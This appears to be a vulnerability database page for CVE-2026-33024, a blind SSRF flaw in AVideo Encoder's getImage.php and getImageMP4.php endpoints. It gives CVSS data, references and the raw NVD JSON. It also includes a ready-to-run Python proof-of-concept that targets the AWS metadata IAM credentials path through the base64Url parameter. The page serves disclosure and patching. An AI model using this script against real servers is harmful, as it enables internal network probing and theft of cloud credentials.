CVE-2026-33024

Description

AVideo is a video-sharing Platform. Versions prior to 8.0 contain a Server-Side Request Forgery vulnerability (CWE-918) in the public thumbnail endpoints getImage.php and getImageMP4.php. Both endpoints accept a base64Url GET parameter, base64-decode it, and pass the resulting URL to ffmpeg as an input source without any authentication requirement. The prior validation only checked that the URL was syntactically valid (FILTER_VALIDATE_URL) and started with http(s)://. This is insufficient: an attacker can supply URLs such as http://169.254.169.254/latest/meta-data/ (AWS/cloud instance metadata), http://192.168.x.x/, or http://127.0.0.1/ to make the server reach internal network resources. The response is not directly returned (blind), but timing differences and error logs can be used to infer results. The issue has been fixed in version 8.0.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo-encoder:*:*:*:*:*:*:*:* - VULNERABLE

AVideo < 8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import base64

def exploit_ssrf(target_url, internal_url):
    """
    Exploit CVE-2026-33024 SSRF in AVideo
    """
    # Endpoint vulnerable to SSRF
    endpoint = "/getImage.php"
    
    # The vulnerable parameter expects a base64 encoded URL
    # Using base64url encoding (replacing + and / with - and _)
    b64_encoded = base64.urlsafe_b64encode(internal_url.encode()).decode().rstrip('=')
    
    # Construct payload
    params = {
        "base64Url": b64_encoded
    }
    
    try:
        print(f"[+] Sending request to {target_url}{endpoint} with payload for {internal_url}")
        response = requests.get(target_url + endpoint, params=params, timeout=10)
        
        # Since it is a blind SSRF, we check status code and timing
        print(f"[+] Response Status Code: {response.status_code}")
        print(f"[+] Response Time: {response.elapsed.total_seconds()} seconds")
        
        # Analysis hint: Check if response time indicates a connection attempt to internal resource
        if response.elapsed.total_seconds() > 5:
            print("[!] Potential timeout detected, possible SSRF trigger.")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    # Example targeting AWS Metadata Service (common SSRF target)
    target = "http://localhost:80" # Replace with actual AVideo host
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    
    exploit_ssrf(target, internal_target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33024
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33024
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33024/
[4] VulDB https://vuldb.com/cve/CVE-2026-33024
[5] https://github.com/WWBN/AVideo-Encoder/commit/f9df098534a0e05fd431e771ac9d70f0f36f1c06
[6] https://github.com/WWBN/AVideo-Encoder/security/advisories/GHSA-h9gh-866r-6vgq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33024", "sourceIdentifier": "[email protected]", "published": "2026-03-20T05:16:15.717", "lastModified": "2026-03-24T16:41:02.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo is a video-sharing Platform. Versions prior to 8.0 contain a Server-Side Request Forgery vulnerability (CWE-918) in the public thumbnail endpoints getImage.php and getImageMP4.php. Both endpoints accept a base64Url GET parameter, base64-decode it, and pass the resulting URL to ffmpeg as an input source without any authentication requirement. The prior validation only checked that the URL was syntactically valid (FILTER_VALIDATE_URL) and started with http(s)://. This is insufficient: an attacker can supply URLs such as http://169.254.169.254/latest/meta-data/ (AWS/cloud instance metadata), http://192.168.x.x/, or http://127.0.0.1/ to make the server reach internal network resources. The response is not directly returned (blind), but timing differences and error logs can be used to infer results. The issue has been fixed in version 8.0."}, {"lang": "es", "value": "AVideo es una plataforma para compartir videos. Las versiones anteriores a la 8.0 contienen una vulnerabilidad de falsificación de petición del lado del servidor (CWE-918) en los puntos finales públicos de miniaturas getImage.php y getImageMP4.php. Ambos puntos finales aceptan un parámetro GET base64Url, lo decodifican en base64 y pasan la URL resultante a ffmpeg como fuente de entrada sin ningún requisito de autenticación. La validación previa solo verificaba que la URL fuera sintácticamente válida (FILTER_VALIDATE_URL) y comenzara con http(s)://. Esto es insuficiente: un atacante puede proporcionar URLs como http://169.254.169.254/latest/meta-data/ (metadatos de instancia de AWS/nube), http://192.168.x.x/, o http://127.0.0.1/ para hacer que el servidor acceda a recursos de red internos. La respuesta no se devuelve directamente (ciega), pero las diferencias de tiempo y los registros de errores pueden usarse para inferir resultados. El problema ha sido solucionado en la versión 8.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo-encoder:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0", "matchCriteriaId": "7838B812-EB07-43E4-B3F6-0887FB6CA33E"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo-Encoder/commit/f9df098534a0e05fd431e771ac9d70f0f36f1c06", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo-Encoder/security/advisories/GHSA-h9gh-866r-6vgq", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}